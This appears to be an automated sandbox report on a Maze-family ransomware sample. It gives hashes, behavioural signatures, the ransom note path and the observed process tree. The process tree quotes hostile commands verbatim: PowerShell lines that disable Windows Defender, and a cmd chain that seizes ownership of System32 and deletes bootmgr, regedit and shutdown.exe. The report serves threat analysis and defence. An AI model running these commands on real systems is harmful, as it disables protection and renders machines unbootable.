Analysis
-
max time kernel
139s -
max time network
52s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
20-09-2022 05:03
Static task
static1
Behavioral task
behavioral1
Sample
UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe
Resource
win7-20220812-en
General
-
Target
UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe
-
Size
4.4MB
-
MD5
a83040b851cf14288d3262d2bd4460fc
-
SHA1
bac8269c66d5b0ca2c5487eb3366c910c99a67e1
-
SHA256
ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1
-
SHA512
89848ac37b274bcdf55cbba3b0dd46013de75563a95ed197d42269a2c1c3c2f62c935f24e8db2a912d5cbfd808575dff12d9141eaea3b103cc4bb7707b1cda8e
-
SSDEEP
98304:6MNbfTJlGuc3B57vYT8A7X27aKc736CtbL8RdwZkid1W5:nN7tvcjUT8A7X219uKdw2B
Malware Config
Extracted
C:\Users\Admin\Desktop\DECRYPT-FILES.TXT
http://mail2tor2zyjdctd.onion/
Signatures
-
Contains code to disable Windows Defender 1 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral1/memory/1992-54-0x0000000000EA0000-0x0000000001316000-memory.dmp disable_win_def -
Maze
Ransomware family also known as ChaCha.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ VSSVC.exe -
Disables Task Manager via registry modification
-
Executes dropped EXE 1 IoCs
pid Process 832 VSSVC.exe -
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\DisconnectSkip.crw => C:\Users\Admin\Pictures\DisconnectSkip.crw.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe VSSVC.exe File renamed C:\Users\Admin\Pictures\ResolveUnblock.crw => C:\Users\Admin\Pictures\ResolveUnblock.crw.bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe VSSVC.exe -
Possible privilege escalation attempt 5 IoCs
pid Process 108 takeown.exe 540 icacls.exe 1772 takeown.exe 1408 icacls.exe 1796 takeown.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion VSSVC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion VSSVC.exe -
Modifies file permissions 1 TTPs 5 IoCs
pid Process 1796 takeown.exe 108 takeown.exe 540 icacls.exe 1772 takeown.exe 1408 icacls.exe -
resource yara_rule behavioral1/files/0x0009000000012677-69.dat themida behavioral1/memory/832-86-0x0000000000280000-0x0000000000AF4000-memory.dmp themida behavioral1/memory/832-87-0x0000000000280000-0x0000000000AF4000-memory.dmp themida -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA VSSVC.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 832 VSSVC.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 1476 powershell.exe 1712 powershell.exe 1312 powershell.exe 1492 powershell.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 1992 UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe Token: SeDebugPrivilege 1992 UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe Token: SeDebugPrivilege 1476 powershell.exe Token: SeDebugPrivilege 1712 powershell.exe Token: SeDebugPrivilege 1312 powershell.exe Token: SeDebugPrivilege 1492 powershell.exe Token: SeDebugPrivilege 832 VSSVC.exe Token: SeDebugPrivilege 832 VSSVC.exe Token: SeTakeOwnershipPrivilege 108 takeown.exe Token: SeTakeOwnershipPrivilege 1772 takeown.exe Token: SeTakeOwnershipPrivilege 1796 takeown.exe -
Suspicious use of WriteProcessMemory 40 IoCs
description pid Process procid_target PID 1992 wrote to memory of 1492 1992 UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe 28 PID 1992 wrote to memory of 1492 1992 UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe 28 PID 1992 wrote to memory of 1492 1992 UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe 28 PID 1992 wrote to memory of 1712 1992 UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe 29 PID 1992 wrote to memory of 1712 1992 UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe 29 PID 1992 wrote to memory of 1712 1992 UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe 29 PID 1992 wrote to memory of 1312 1992 UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe 30 PID 1992 wrote to memory of 1312 1992 UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe 30 PID 1992 wrote to memory of 1312 1992 UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe 30 PID 1992 wrote to memory of 1476 1992 UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe 33 PID 1992 wrote to memory of 1476 1992 UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe 33 PID 1992 wrote to memory of 1476 1992 UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe 33 PID 1992 wrote to memory of 832 1992 UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe 36 PID 1992 wrote to memory of 832 1992 UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe 36 PID 1992 wrote to memory of 832 1992 UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe 36 PID 1992 wrote to memory of 832 1992 UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe 36 PID 832 wrote to memory of 772 832 VSSVC.exe 38 PID 832 wrote to memory of 772 832 VSSVC.exe 38 PID 832 wrote to memory of 772 832 VSSVC.exe 38 PID 832 wrote to memory of 772 832 VSSVC.exe 38 PID 772 wrote to memory of 108 772 cmd.exe 40 PID 772 wrote to memory of 108 772 cmd.exe 40 PID 772 wrote to memory of 108 772 cmd.exe 40 PID 772 wrote to memory of 108 772 cmd.exe 40 PID 772 wrote to memory of 540 772 cmd.exe 41 PID 772 wrote to memory of 540 772 cmd.exe 41 PID 772 wrote to memory of 540 772 cmd.exe 41 PID 772 wrote to memory of 540 772 cmd.exe 41 PID 772 wrote to memory of 1772 772 cmd.exe 42 PID 772 wrote to memory of 1772 772 cmd.exe 42 PID 772 wrote to memory of 1772 772 cmd.exe 42 PID 772 wrote to memory of 1772 772 cmd.exe 42 PID 772 wrote to memory of 1408 772 cmd.exe 43 PID 772 wrote to memory of 1408 772 cmd.exe 43 PID 772 wrote to memory of 1408 772 cmd.exe 43 PID 772 wrote to memory of 1408 772 cmd.exe 43 PID 772 wrote to memory of 1796 772 cmd.exe 44 PID 772 wrote to memory of 1796 772 cmd.exe 44 PID 772 wrote to memory of 1796 772 cmd.exe 44 PID 772 wrote to memory of 1796 772 cmd.exe 44
Processes
-
C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe"C:\Users\Admin\AppData\Local\Temp\UDS-Trojan.Multi.GenericML.xnet-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1992 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1492
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent NeverSend2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting Disable2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1312
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1476
-
-
C:\Users\Admin\AppData\Local\Temp\VSSVC.exe"C:\Users\Admin\AppData\Local\Temp\VSSVC.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Modifies extensions of user files
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && takeown /f C:\Windows\System32\shutdown.exe && icacls C:\Windows\System32\shutdown.exe /grant %username%:F && del C:\Windows\System32\shutdown.exe && Exit3⤵
- Suspicious use of WriteProcessMemory
PID:772 -
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System324⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:108
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32 /grant Admin:F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:540
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\drivers4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1772
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32\drivers /grant Admin:F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1408
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System32\LogonUI.exe4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1796
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3.1MB
MD5e4f24d91d8e7290ffd6afc8aa01c6d63
SHA1b552c6af33cc5a62379028687924406cba8ff74d
SHA2565eb371a9cf91b981502d3ee26880b8c15f62b3eeaaa2484d523a2a03a233bebb
SHA512ae0d0c2494b0a4753039f4fdf6a589848a44a386b759511aab9374e9446f84c39895ec2c9d00ed0ce3df07663a9f14e2f21f42a85966336b0e35204da0d82e00
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5fb8901bfb5eb8b5cd51c393f6e11ea2e
SHA1659d7e2e79485eb006372ff061fdffe0961f5e43
SHA256bfc1cb93abb78c50cf8a280d440551adbfba9ca138be5aa472cbdab95f05f209
SHA51282e6d79b836fae138c00c47242318b4a8b3c981bc71c431c1bd4062b08287a7a1f7a6667becb58b9ca5525f999efb20e15655f585982748536fb09f5df8c8e49
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5fb8901bfb5eb8b5cd51c393f6e11ea2e
SHA1659d7e2e79485eb006372ff061fdffe0961f5e43
SHA256bfc1cb93abb78c50cf8a280d440551adbfba9ca138be5aa472cbdab95f05f209
SHA51282e6d79b836fae138c00c47242318b4a8b3c981bc71c431c1bd4062b08287a7a1f7a6667becb58b9ca5525f999efb20e15655f585982748536fb09f5df8c8e49